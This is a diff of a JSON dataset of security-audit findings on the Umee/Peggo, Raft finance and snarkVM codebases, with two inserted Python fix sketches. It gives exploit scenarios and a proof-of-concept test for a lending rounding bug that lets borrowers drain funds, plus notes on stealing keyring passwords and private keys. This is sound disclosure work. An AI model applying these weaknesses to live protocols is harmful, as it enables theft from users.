Additionally, neither the price-feeder README nor the relevant documentation string instructs users to provide keyring passwords via standard input (figure 25.2), which is a safer approach. Moreover, neither source provides information on different keyring back ends, and the example price-feeder configuration uses the \"test\" back end. An attacker with access to the configuration file on a user's system, or to a backup of the configuration file, could steal the user's keyring information and hijack the price-feeder oracle instance. $ ls -la ./price-feeder/price-feeder.example.toml -rwxrwxrwx 1 dc dc 848 Feb 6 10:37 ./price-feeder/price-feeder.example.toml $ grep pass ./price-feeder/price-feeder.example.toml pass = \"exampleKeyringPassword\" $ ~/go/bin/price-feeder ./price-feeder/price-feeder.example.toml 10:42AM INF starting price-feeder oracle... 10:42AM ERR oracle tick failed error=\"key with address A4F324A31DECC0172A83E57A3625AF4B89A91F1F not found: key not found\" module=oracle 10:42AM INF starting price-feeder server... listen_addr=0.0.0.0:7171 Figure 25.1: The price-feeder does not warn the user if the configuration file used to store the keyring password in plaintext has overly broad permissions. // CreateClientContext creates an SDK client Context instance used for transaction // generation, signing and broadcasting. func (oc OracleClient) CreateClientContext() (client.Context, error ) { var keyringInput io.Reader if len (oc.KeyringPass) > 0 { keyringInput = newPassReader(oc.KeyringPass) } else { keyringInput = os.Stdin } Figure 25.2: The price-feeder supports the use of standard input to provide keyring passwords. ( umee/price-feeder/oracle/client/client.go#L184-L192 ) Exploit Scenario A user sets up a price-feeder oracle and stores the keyring password in the price-feeder configuration file, which has been misconfigured with overly broad permissions. An attacker gains access to another user account on the user's machine and is able to read the price-feeder oracle's keyring password. The attacker uses that password to access the keyring data and can then control the user's oracle account. Recommendations Short term, take the following steps: Recommend that users provide keyring passwords via standard input. Check the permissions of the configuration file. If the permissions are too broad, provide an error warning the user of the issue, as openssh does when it finds that a private key file has overly broad permissions. Document the risks associated with storing a keyring password in the configuration file. Improve the price-feeder's keyring-related documentation. Include a link to the Cosmos SDK keyring documentation so that users can learn about different keyring back ends and the addition of keyring entries, among other concepts. 26. Insufficient validation of genesis parameters Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-UMEE-26 Target: Genesis parameters", + "title": "2. Issues with Chainlink oracles' return data validation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "Chainlink oracles are used to compute the price of a collateral token throughout the protocol. When validating the oracle's return data, the returned price is compared to the price of the previous round. However, there are a few issues with the validation: The currentRoundId value may not increase by exactly one across rounds. The only requirement is that the roundID increases monotonically. 
The updatedAt value in the oracle response is never checked, so potentially stale data could be coming from the priceAggregator contract. The roundId and answeredInRound values in the oracle response are not checked for equality, a check that would indicate whether the answer returned by the oracle is fresh. function _badChainlinkResponse (ChainlinkResponse memory response) internal view returns ( bool ) { return !response.success || response.roundId == 0 || response.timestamp == 0 || response.timestamp > block.timestamp || response.answer <= 0 ; } Figure 2.1: The Chainlink oracle response validation logic Exploit Scenario The Chainlink oracle attempts to compare the current returned price to the price in the previous roundID. However, because the roundID did not increase by one from the previous round to the current round, the request fails, and the price oracle returns a failure. A stale price is then used by the protocol. Recommendations Short term, have the code validate that the timestamp value is greater than 0 to ensure that the data is fresh. Also, have the code check that the roundID and answeredInRound values are equal to ensure that the returned answer is not stale. Lastly, check that the timestamp value is not decreasing from round to round. Long term, carefully investigate oracle integrations for potential footguns in order to conform to correct API usage. References The Historical-Price-Feed-Data Project", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: High" ] }, {
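Editor's aside: a sketch of the checks recommended in finding 2, assuming a response shaped like Chainlink's latestRoundData tuple. The dictionary field names, the prev_updated_at bookkeeping, and the MAX_AGE staleness window are illustrative choices, not Raft code.

import time

MAX_AGE = 3600  # hypothetical staleness window, in seconds

def is_fresh(resp, prev_updated_at):
    """Sketch of the recommended validation for a Chainlink-style round."""
    return (
        resp["answer"] > 0
        and resp["answered_in_round"] == resp["round_id"]  # answered this round
        and resp["updated_at"] > 0                          # data was reported
        and resp["updated_at"] >= prev_updated_at           # not going backwards
        and time.time() - resp["updated_at"] <= MAX_AGE     # not stale
    )

resp = {"round_id": 101, "answered_in_round": 101,
        "answer": 1850_00000000, "updated_at": time.time() - 30}
assert is_fresh(resp, prev_updated_at=resp["updated_at"] - 600)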
- "title": "27. Potential overflows in Peggo's current block calculations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "In a few code paths, Peggo calculates the number of a delayed block by subtracting a delay value from the latest block number. This subtraction will result in an overflow and cause Peggo to operate incorrectly if it is run against a blockchain node whose latest block number is less than the delay value. We set the severity of this finding to informational because the issue is unlikely to occur in practice; moreover, it is easy to have Peggo wait to perform the calculation until the latest block number is one that will not cause an overflow. An overflow may occur in the following methods: gravityOrchestrator.GetLastCheckedBlock (figure 27.1) gravityOrchestrator.CheckForEvents gravityOrchestrator.EthOracleMainLoop gravityRelayer.FindLatestValset // add delay to ensure minimum confirmations are received and block is finalized currentBlock := latestHeader.Number.Uint64() - ethBlockConfirmationDelay Figure 27.1: peggo/orchestrator/oracle_resync.go#L35-L42 Recommendations Short term, have Peggo wait to calculate the current block number until the blockchain for which Peggo was configured reaches a block number that will not cause an overflow.", + "title": "3. Incorrect constant for 1000-year periods ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "The Raft finance contracts rely on computing the exponential decay to determine the correct base rate for redemptions. In the MathUtils library, a period of 1000 years is chosen as the maximum time period for the decay exponent to prevent an overflow. However, the _MINUTES_IN_1000_YEARS constant used is currently incorrect: /// @notice Number of minutes in 1000 years. uint256 internal constant _MINUTES_IN_1000_YEARS = 1000 * 356 days / 1 minutes; Figure 3.1: The declaration of the _MINUTES_IN_1000_YEARS constant Recommendations Short term, change the code to compute the _MINUTES_IN_1000_YEARS constant as 1000 * 365 days / 1 minutes. Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the system. Integrate Echidna and smart contract fuzzing in the system to triangulate subtle arithmetic issues.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3682,149 +6380,159 @@ ] }, { - "title": "28. Peggo does not validate Ethereum address formats ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "In several code paths in the Peggo codebase, the go-ethereum HexToAddress function (figure 28.1) is used to parse Ethereum addresses. This function does not return an error when the format of the address passed to it is incorrect. The HexToAddress function is used in tests as well as in the following parts of the codebase: peggo/cmd/peggo/bridge.go#L143 (in the peggo deploy-gravity command, to parse addresses fetched from gravityQueryClient ) peggo/cmd/peggo/bridge.go#L403 (in parsing of the peggo send-to-cosmos command's token-address argument) peggo/cmd/peggo/orchestrator.go#L150 (in the peggo orchestrator [gravity-addr] command) peggo/cmd/peggo/bridge.go#L536 and twice in #L545-L555 peggo/cmd/peggo/keys.go#L199, #L274, and #L299 peggo/orchestrator/ethereum/gravity/message_signatures.go#L36, #L40, #L102, and #L117 peggo/orchestrator/ethereum/gravity/submit_batch.go#L53, #L72, #L94, #L136, and #L144 peggo/orchestrator/ethereum/gravity/valset_update.go#L37, #L55, and #L87 peggo/orchestrator/main_loops.go#L307 peggo/orchestrator/relayer/batch_relaying.go#L81-L82, #L237, and #L250 We set the severity of this finding to undetermined because time constraints prevented us from verifying the impact of the issue. However, without additional validation of the addresses fetched from external sources, Peggo may operate on an incorrect Ethereum address. // HexToAddress returns Address with byte values of s. // If s is larger than len(h), s will be cropped from the left. func HexToAddress( s string ) Address { return BytesToAddress( FromHex(s) ) } // FromHex returns the bytes represented by the hexadecimal string s. // s may be prefixed with \"0x\". func FromHex(s string ) [] byte { if has0xPrefix(s) { s = s[ 2 :] } if len (s)% 2 == 1 { s = \"0\" + s } return Hex2Bytes(s) } // Hex2Bytes returns the bytes represented by the hexadecimal string str. func Hex2Bytes(str string ) [] byte { h, _ := hex.DecodeString(str) return h } Figure 28.1: The HexToAddress function, which calls the BytesToAddress, FromHex, and Hex2Bytes functions, ignores any errors that occur during hex-decoding. Recommendations Short term, review the code paths that use the HexToAddress function, and use a function like ValidateEthAddress to validate Ethereum address string formats before calls to HexToAddress. Long term, add tests to ensure that all code paths that use the HexToAddress function properly validate Ethereum address strings before parsing them.", + "title": "4. Inconsistent use of safeTransfer for collateralToken ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "The Raft contracts rely on ERC-20 tokens as collateral that must be deposited in order to mint R tokens. 
However, although the SafeERC20 library is used for collateral token transfers, there are a few places where the safeTransfer function is missing: The transfer of collateralToken in the liquidate function in the PositionManager contract: if (!isRedistribution) { rToken.burn( msg.sender , entirePositionDebt); _totalDebt -= entirePositionDebt; emit TotalDebtChanged(_totalDebt); // Collateral is sent to protocol as a fee only in case of liquidation collateralToken.transfer(feeRecipient, collateralLiquidationFee); } collateralToken.transfer( msg.sender , collateralToSendToLiquidator); Figure 4.1: Unchecked transfers in PositionManager.liquidate The transfer of stETH in the managePositionStETH function in the PositionManagerStETH contract: { if (isCollateralIncrease) { stETH.transferFrom( msg.sender , address ( this ), collateralChange); stETH.approve( address (wstETH), collateralChange); uint256 wstETHAmount = wstETH.wrap(collateralChange); _managePosition( ... ); } else { _managePosition( ... ); uint256 stETHAmount = wstETH.unwrap(collateralChange); stETH.transfer( msg.sender , stETHAmount); } } Figure 4.2: Unchecked transfers in PositionManagerStETH.managePositionStETH Exploit Scenario Governance approves an ERC-20 token that returns a Boolean on failure to be used as collateral. However, since the return values of this ERC-20 token are not checked, Alice, a liquidator, does not receive any collateral for performing a liquidation. Recommendations Short term, use the SafeERC20 library's safeTransfer function for the collateralToken. Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the protocol.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Medium" ] }, { - "title": "29. Peggo takes an Ethereum private key as a command-line argument ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Certain Peggo commands take an Ethereum private key ( --eth-pk ) as a command-line argument. If an attacker gained access to a user account on a system running Peggo, the attacker would also gain access to any Ethereum private key passed through the command line. The attacker could then use the key to steal funds from the Ethereum account. $ peggo orchestrator {gravityAddress} \ --eth-pk= $ETH_PK \ --eth-rpc= $ETH_RPC \ --relay-batches= true \ --relay-valsets= true \ --cosmos-chain-id=... \ --cosmos-grpc= \"tcp://...\" \ --tendermint-rpc= \"http://...\" \ --cosmos-keyring=... \ --cosmos-keyring-dir=... \ --cosmos-from=... Figure 29.1: An example of a Peggo command line In Linux, all users can inspect other users' commands and their arguments. A user can enable the proc filesystem's hidepid=2 gid=0 mount options to hide metadata about spawned processes from users who are not members of the specified group. However, in many Linux distributions, those options are not enabled by default. Exploit Scenario An attacker gains access to an unprivileged user account on a system running the Peggo orchestrator. The attacker then uses a tool such as pspy to inspect processes run on the system. When a user or script launches the Peggo orchestrator, the attacker steals the Ethereum private key passed to the orchestrator. Recommendations Short term, avoid using a command-line argument to pass an Ethereum private key to the Peggo program. Instead, fetch the private key from the keyring.", + "title": "5. 
Tokens may be trapped in an invalid position ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "The Raft finance contracts allow users to take out positions by depositing collateral and minting a corresponding amount of R tokens as debt. In order to exit a position, a user must pay back their debt, which allows them to receive their collateral back. To check that a position is closed, the _managePosition function contains a branch that validates that the position's debt is zero after adjustment. However, if the position's debt is zero but there is still some collateral present even after adjustment, then the position is considered invalid and cannot be closed. This could be problematic, especially if some dust is present in the position after the collateral is withdrawn. if (positionDebt == 0 ) { if (positionCollateral != 0 ) { revert InvalidPosition(); } // position was closed, remove it _closePosition(collateralToken, position, false ); } else { _checkValidPosition(collateralToken, positionDebt, positionCollateral); if (newPosition) { collateralTokenForPosition[position] = collateralToken; emit PositionCreated(position); } } Figure 5.1: A snippet from the _managePosition function showing that a position with no debt cannot be closed if any amount of collateral remains Exploit Scenario Alice, a borrower, wants to pay back her debt and receive her collateral in exchange. However, she accidentally leaves some collateral in her position despite paying back all her debt. As a result, her position cannot be closed. Recommendations Short term, if a position's debt is zero, have the _managePosition function refund any excess collateral and close the position. Long term, carefully investigate potential edge cases in the system and use smart contract fuzzing to determine if those edge cases can be realistically reached.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "30. Peggo allows the use of non-local unencrypted URL schemes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The peggo orchestrator command takes --tendermint-rpc and --cosmos-grpc flags specifying Tendermint and Cosmos remote procedure call (RPC) URLs. If an unencrypted non-local URL scheme (such as http://) is passed to one of those flags, Peggo will not reject it or issue a warning to the user. As a result, an attacker connected to the same local network as the system running Peggo could launch a man-in-the-middle attack, intercepting and modifying the network traffic of the device. $ peggo orchestrator {gravityAddress} \ --eth-pk= $ETH_PK \ --eth-rpc= $ETH_RPC \ --relay-batches= true \ --relay-valsets= true \ --cosmos-chain-id=... \ --cosmos-grpc= \"tcp://...\" \ --tendermint-rpc= \"http://...\" \ --cosmos-keyring=... \ --cosmos-keyring-dir=... \ --cosmos-from=... Figure 30.1: The problematic flags Exploit Scenario A user sets up Peggo with an external Tendermint RPC address and an unencrypted URL scheme (http://). An attacker on the same network performs a man-in-the-middle attack, modifying the values sent to the Peggo orchestrator to his advantage. Recommendations Short term, warn users that they risk a man-in-the-middle attack if they set the RPC endpoint addresses to external hosts that use unencrypted schemes such as http://.", + "title": "6. 
Price deviations between stETH and ETH may cause Tellor oracle to return an incorrect price ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "The Raft finance contracts rely on oracles to compute the price of the collateral tokens used throughout the codebase. If the Chainlink oracle is down, the Tellor oracle is used as a backup. However, the Tellor oracle does not use the stETH/USD price feed. Instead, it uses the ETH/USD price feed to determine the price of stETH. This could be problematic if stETH depegs, which can occur during black swan events. function _getCurrentTellorResponse() internal view returns (TellorResponse memory tellorResponse) { uint256 count; uint256 time; uint256 value; try tellor.getNewValueCountbyRequestId(ETHUSD_TELLOR_REQ_ID) returns ( uint256 count_) { count = count_; } catch { return (tellorResponse); } Figure 6.1: The Tellor oracle fetching the price of ETH to determine the price of stETH Exploit Scenario Alice has a position in the system. A significant black swan event causes the depeg of staked Ether. As a result, the Tellor oracle returns an incorrect price, which prevents Alice's position from being liquidated despite being eligible for liquidation. Recommendations Short term, carefully monitor the Tellor oracle, especially during any sort of market volatility. Long term, investigate the robustness of the oracles and document possible circumstances that could cause them to return incorrect prices.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "31. Lack of prioritization of Peggo orchestrator messages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Peggo orchestrator messages, like oracle messages ( TOB-UMEE-20 ), are not prioritized over other transactions for inclusion in a block. As a result, if the network is highly congested, orchestrator transactions may not be included in the earliest possible block. Although the Umee system could increase the fee charged for including a Peggo orchestrator message in a block, that solution is suboptimal and may not work. Tactics for prioritizing important transactions include the following: Using the custom CheckTx implementation introduced in Tendermint version 0.35, which returns a priority argument Reimplementing part of the Tendermint engine, as Terra Money did Using Substrate's dispatch classes, which allow developers to mark transactions as normal, operational, or mandatory Exploit Scenario A user sends tokens from Ethereum to Umee by calling Gravity Bridge's sendToCosmos function. When validators notice the transaction in the Ethereum logs, they send MsgSendToCosmosClaim messages to Umee. However, 34% of the messages are front-run by an attacker, effectively stopping Umee from acknowledging the token transfer. Recommendations Short term, use a custom CheckTx method to prioritize Peggo orchestrator messages. Long term, ensure that operations that affect the whole system cannot be front-run or delayed by attackers or blocked by network congestion. 32. Failure of a single broadcast Ethereum transaction causes a batch-wide failure Severity: Undetermined Difficulty: High Type: Configuration Finding ID: TOB-UMEE-32 Target: Peggo orchestrator", + "title": "7. 
Incorrect constant value for MAX_REDEMPTION_SPREAD ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "The Raft protocol allows a user to redeem their R tokens for underlying wstETH at any time. By doing so, the protocol ensures that it maintains overcollateralization. The redemption spread is part of the redemption rate, which changes based on the price of the R token to incentivize or disincentivize redemption. However, the documentation says that the maximum redemption spread should be 100% and that the protocol will initially set it to 100%. In the code, the MAX_REDEMPTION_SPREAD constant is set to 2%, and the redemptionSpread variable is set to 1% at construction. This is problematic because setting the rate to 100% is necessary to effectively disable redemptions at launch. uint256 public constant override MIN_REDEMPTION_SPREAD = MathUtils._100_PERCENT / 10_000 * 25 ; // 0.25% uint256 public constant override MAX_REDEMPTION_SPREAD = MathUtils._100_PERCENT / 100 * 2 ; // 2% Figure 7.1: Constants specifying the minimum and maximum redemption spread percentages constructor (ISplitLiquidationCollateral newSplitLiquidationCollateral) FeeCollector( msg.sender ) { rToken = new RToken( address ( this ), msg.sender ); raftDebtToken = new ERC20Indexable( address ( this ), string ( bytes .concat( \"Raft \" , bytes (IERC20Metadata( address (rToken)).name()), \" debt\" )), string ( bytes .concat( \"r\" , bytes (IERC20Metadata( address (rToken)).symbol()), \"-d\" )) ); setRedemptionSpread(MathUtils._100_PERCENT / 100 ); setSplitLiquidationCollateral(newSplitLiquidationCollateral); emit PositionManagerDeployed(rToken, raftDebtToken, msg.sender ); } Figure 7.2: The redemption spread being set to 1% instead of 100% in the PositionManager's constructor Exploit Scenario The protocol sets the redemption spread to 2%. Alice, a borrower, redeems her R tokens for some underlying wstETH, despite the developers' intentions. As a result, the stablecoin experiences significant volatility. Recommendations Short term, set the MAX_REDEMPTION_SPREAD value to 100% and set the redemptionSpread variable to MAX_REDEMPTION_SPREAD in the PositionManager contract's constructor. Long term, improve unit test coverage to identify incorrect behavior and edge cases in the protocol.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Medium" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "33. Peggo orchestrator's IsBatchProfitable function uses only one price oracle ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The Peggo orchestrator relays batches of Ethereum transactions only when doing so will be profitable (figure 33.1). To determine an operation's profitability, it uses the price of ETH in USD, which is fetched from a single source, the CoinGecko API. This creates a single point of failure, as a hacker with control of the API could effectively choose which batches Peggo would relay by manipulating the price. The IsBatchProfitable function (figure 33.2) fetches the ETH/USD price; the gravityRelayer.priceFeeder field it uses is set earlier in the getOrchestratorCmd function (figure 33.3). func (s *gravityRelayer) RelayBatches( /* (...) */ ) error { // (...) for tokenContract, batches := range possibleBatches { // (...) // Now we iterate through batches per token type. for _, batch := range batches { // (...) // If the batch is not profitable, move on to the next one. 
if !s.IsBatchProfitable(ctx, batch.Batch, estimatedGasCost, gasPrice, s.profitMultiplier) { continue } // (...) Figure 33.1: peggo/orchestrator/relayer/batch_relaying.go#L173-L176 func (s *gravityRelayer) IsBatchProfitable( /* (...) */ ) bool { // (...) // First we get the cost of the transaction in USD usdEthPrice, err := s.priceFeeder.QueryETHUSDPrice() Figure 33.2: peggo/orchestrator/relayer/batch_relaying.go#L211-L223 func getOrchestratorCmd() *cobra.Command { cmd := &cobra.Command{ Use: \"orchestrator [gravity-addr]\" , Args: cobra.ExactArgs( 1 ), Short: \"Starts the orchestrator\" , RunE: func (cmd *cobra.Command, args [] string ) error { // (...) coingeckoAPI := konfig.String(flagCoinGeckoAPI) coingeckoFeed := coingecko.NewCoingeckoPriceFeed( /* (...) */ ) // (...) relayer := relayer.NewGravityRelayer( /* (...) */ , relayer.SetPriceFeeder(coingeckoFeed), ) Figure 33.3: peggo/cmd/peggo/orchestrator.go#L162-L188 Exploit Scenario All Peggo orchestrator instances depend on the CoinGecko API. An attacker hacks the CoinGecko API and falsifies the ETH/USD prices provided to the Peggo relayers, causing them to relay unprofitable batches. Recommendations Short term, address the Peggo orchestrator's reliance on a single ETH/USD price feed. Consider using the price-feeder tool to fetch pricing information or reading prices from the Umee blockchain. Long term, implement protections against extreme ETH/USD price changes; if the ETH/USD price changes by too large a margin, have the system stop fetching prices and require an operator to investigate whether the issue was caused by malicious behavior. Additionally, implement tests to check the orchestrator's handling of random and extreme changes in the prices reported by the price feed. References Check Coingecko prices separately from BatchRequesterLoop (GitHub issue)", + "title": "8. Liquidation rewards are calculated incorrectly ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "Whenever a position's collateralization ratio falls between 100% and 110%, the position becomes eligible for liquidation. A liquidator can pay off the position's total debt to restore solvency. In exchange, the liquidator receives a liquidation reward for removing bad debt, in addition to the amount of debt the liquidator has paid off. However, the calculation performed in the split function is incorrect and does not reward the liquidator with the matchingCollateral amount of tokens: function split( uint256 totalCollateral, uint256 totalDebt, uint256 price, bool isRedistribution ) external pure returns ( uint256 collateralToSendToProtocol, uint256 collateralToSentToLiquidator) { if (isRedistribution) { ... } else { uint256 matchingCollateral = totalDebt.divDown(price); uint256 excessCollateral = totalCollateral - matchingCollateral; uint256 liquidatorReward = excessCollateral.mulDown(_calculateLiquidatorRewardRate(totalDebt)); collateralToSendToProtocol = excessCollateral - liquidatorReward; collateralToSentToLiquidator = liquidatorReward; } } Figure 8.1: The calculations for how to split the collateral between the liquidator and the protocol, showing that the matchingCollateral is omitted from the liquidator's reward Exploit Scenario Alice, a liquidator, attempts to liquidate an insolvent position. However, upon liquidation, she receives only the liquidationReward amount of tokens, without the matchingCollateral . As a result, her liquidation is unprofitable and she has lost funds. 
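Editor's aside: the corrected split in finding 8 is easiest to see numerically. A Python sketch under the finding's recommendation — a flat rate stands in for _calculateLiquidatorRewardRate, and the floating-point math is only illustrative of the fixed-point original. With 11 units of collateral backing 10 units of debt at price 1, the liquidator gets back 10.05 units rather than 0.05, so repaying the debt is no longer a loss.

LIQUIDATOR_REWARD_RATE = 0.05  # stand-in for _calculateLiquidatorRewardRate(totalDebt)

def split(total_collateral, total_debt, price):
    """Sketch of the recommended liquidation split (non-redistribution case)."""
    matching_collateral = total_debt / price       # covers the debt the liquidator repaid
    excess_collateral = total_collateral - matching_collateral
    liquidator_reward = excess_collateral * LIQUIDATOR_REWARD_RATE
    to_protocol = excess_collateral - liquidator_reward
    # Fix: the liquidator also receives matching_collateral, not just the reward.
    to_liquidator = liquidator_reward + matching_collateral
    return to_protocol, to_liquidator

to_protocol, to_liquidator = split(total_collateral=11.0, total_debt=10.0, price=1.0)
assert to_liquidator > 10.0  # repaid debt comes back, plus the reward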
Recommendations Short term, have the code compute the collateralToSendToLiquidator variable as liquidationReward + matchingCollateral. Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the protocol. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "34. Rounding errors may cause the module to incur losses ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The amount that a user has borrowed is calculated using AdjustedBorrow data and an InterestScalar value. Because the system uses fixed-precision decimal numbers that are truncated to integer values, there may be small rounding errors in the computation of those amounts. If an error occurs, it will benefit the user, whose repayment will be slightly lower than the amount the user borrowed. Figure 34.1 shows a test case demonstrating this vulnerability. It should be added to the umee/x/leverage/keeper/keeper_test.go file. Appendix G discusses general rounding recommendations. // Test rounding error bug - users can repay less than have borrowed // It should pass func (s *IntegrationTestSuite) TestTruncationBug() { lenderAddr, _ := s.initBorrowScenario() app, ctx := s.app, s.ctx // set some interesting interest scalar _ = s.app.LeverageKeeper.SetInterestScalar(s.ctx, umeeapp.BondDenom, sdk.MustNewDecFromStr( \"2.9\" )) // save initial balances initialSupply := s.app.BankKeeper.GetSupply(s.ctx, umeeapp.BondDenom) s.Require().Equal(initialSupply.Amount.Int64(), int64 ( 10000000000 )) initialModuleBalance := s.app.LeverageKeeper.ModuleBalance(s.ctx, umeeapp.BondDenom) // lender borrows 20 umee err := s.app.LeverageKeeper.BorrowAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, 20000000 )) s.Require().NoError(err) // lender repays in a few transactions iters := int64 ( 99 ) payOneIter := int64 ( 2000 ) amountDelta := int64 ( 99 ) // borrowed expects to \"earn\" this amount for i := int64 ( 0 ); i < iters; i++ { repaid, err := s.app.LeverageKeeper.RepayAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, payOneIter)) s.Require().NoError(err) s.Require().Equal(sdk.NewInt(payOneIter), repaid) } // lender repays remaining debt - less than he borrowed // we send 90000000, because it will be truncated to the actually owned amount repaid, err := s.app.LeverageKeeper.RepayAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, 90000000 )) s.Require().NoError(err) s.Require().Equal(repaid.Int64(), 20000000 -(iters*payOneIter)-amountDelta) // verify lender's new loan amount in the correct denom (zero) loanBalance := s.app.LeverageKeeper.GetBorrow(ctx, lenderAddr, umeeapp.BondDenom) s.Require().Equal(loanBalance, sdk.NewInt64Coin(umeeapp.BondDenom, 0 )) // we expect total supply to not change finalSupply := s.app.BankKeeper.GetSupply(s.ctx, umeeapp.BondDenom) s.Require().Equal(initialSupply, finalSupply) // verify lender's new umee balance // should be 10 - 1k from initial + 20 from loan - 20 repaid = 9000 umee // it is more -> borrower benefits tokenBalance := app.BankKeeper.GetBalance(ctx, lenderAddr, umeeapp.BondDenom) s.Require().Equal(tokenBalance, sdk.NewInt64Coin(umeeapp.BondDenom, 9000000000 +amountDelta)) // in test, we didn't pay interest, so module balance should not have changed // but it did 
because of rounding moduleBalance := s.app.LeverageKeeper.ModuleBalance(s.ctx, umeeapp.BondDenom) s.Require().NotEqual(moduleBalance, initialModuleBalance) s.Require().Equal(moduleBalance.Int64(), int64 ( 1000000000 -amountDelta)) } Figure 34.1: A test case demonstrating the rounding bug Exploit Scenario An attacker identifies a high-value coin. He takes out a loan and repays it in a single transaction and then repeats the process again and again. By using a single transaction for both operations, he evades the borrowing fee (i.e., the interest scalar is not increased). Because of rounding errors in the system's calculations, he turns a profit by repaying less than he borrowed each time. His profits exceed the transaction fees, and he continues his attack until he has completely drained the module of its funds. Exploit Scenario 2 The Umee system has numerous users. Each user executes many transactions, so the system must perform many calculations. Each calculation with a rounding error causes it to lose a small amount of tokens, but eventually, the small losses add up and leave the system without the essential funds. Recommendations Short term, always use the rounding direction that will benefit the module rather than the user. Long term, to ensure that users pay the necessary fees, consider prohibiting them from borrowing and repaying a loan in the same block. Additionally, use fuzz testing to ensure that it is not possible for users to secure free tokens. References How to Become a Millionaire, 0.", + "title": "1. Console's Field and Scalar divisions panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The division operations of the Field and Scalar types do not guard against a division by zero. This causes a runtime panic when values from these types are divided by zero. Figure 1.1 shows a test and the respective stack backtrace, where a None option is unconditionally unwrapped in snarkvm/fields/src/fp_256.rs : #[test] fn test_div () { let zero = Field::::zero(); // Sample a new field. let num = Field::::new(Uniform::rand(& mut test_rng())); // Divide by zero let neg = num.div(zero); } // running 1 test // thread 'arithmetic::tests::test_div' panicked at 'called `Option::unwrap()` on a `None` value', /snarkvm/fields/src/fp_256.rs:709:42 // stack backtrace: // 0: rust_begin_unwind // at /rustc/v/library/std/src/panicking.rs:584:5 // 1: core::panicking::panic_fmt // at /rustc/v/library/core/src/panicking.rs:142:14 // 2: core::panicking::panic // at /rustc/v/library/core/src/panicking.rs:48:5 // 3: core::option::Option::unwrap // at /rustc/v/library/core/src/option.rs:755:21 // 4: as core::ops::arith::DivAssign<&snarkvm_fields::fp_256::Fp256>>::div_assign // at snarkvm/fields/src/fp_256.rs:709:26 // 5: as core::ops::arith::Div>::div // at snarkvm/fields/src/macros.rs:524:17 // 6: snarkvm_console_types_field::arithmetic::>::div // at ./src/arithmetic.rs:143: // 7: snarkvm_console_types_field::arithmetic::tests::test_div // at ./src/arithmetic.rs:305:23 Figure 1.1: Test triggering the division by zero The same issue is present in the Scalar type, which has no zero-check for other : impl Div> for Scalar { type Output = Scalar; /// Returns the `quotient` of `self` and `other`. #[inline] fn div ( self , other: Scalar ) -> Self ::Output { Scalar::new( self .scalar / other.scalar) } } Figure 1.2: console/types/scalar/src/arithmetic.rs#L137-L146 Exploit Scenario An attacker sends a zero value which is used in a division, causing a runtime error and the program to halt. Recommendations Short term, add checks to validate that the divisor is non-zero on both the Field and Scalar divisions. Long term, add tests exercising all arithmetic operations with the zero element.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "35. Outdated and vulnerable dependencies ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Both Umee and Peggo rely on outdated and vulnerable dependencies. The table below lists the problematic packages used by Umee dependencies; the yellow rows indicate packages that were also detected in Peggo dependencies. We set the severity of this finding to undetermined because we could not confirm whether these vulnerabilities affect Umee or Peggo. However, they likely do not, since most of the CVEs are related to binaries or components that are not run in the Umee or Peggo code. Package Vulnerabilities golang/github.com/coreos/etcd@3.3.13 pkg:golang/github.com/dgrijalva/jwt-go@3.2.0 CVE-2020-15114 CVE-2020-15136 CVE-2020-15115 CVE-2020-26160 golang/github.com/microcosm-cc/bluemonday@1.0.4 #111 (CWE-79) golang/k8s.io/kubernetes@1.13.0 CVE-2020-8558, CVE-2019-11248, CVE-2019-11247, CVE-2019-11243, CVE-2021-25741, CVE-2019-9946, CVE-2020-8552, CVE-2019-11253, CVE-2020-8559, CVE-2021-25735, CVE-2019-11250, CVE-2019-11254, CVE-2019-11249, CVE-2019-11246, CVE-2019-1002100, 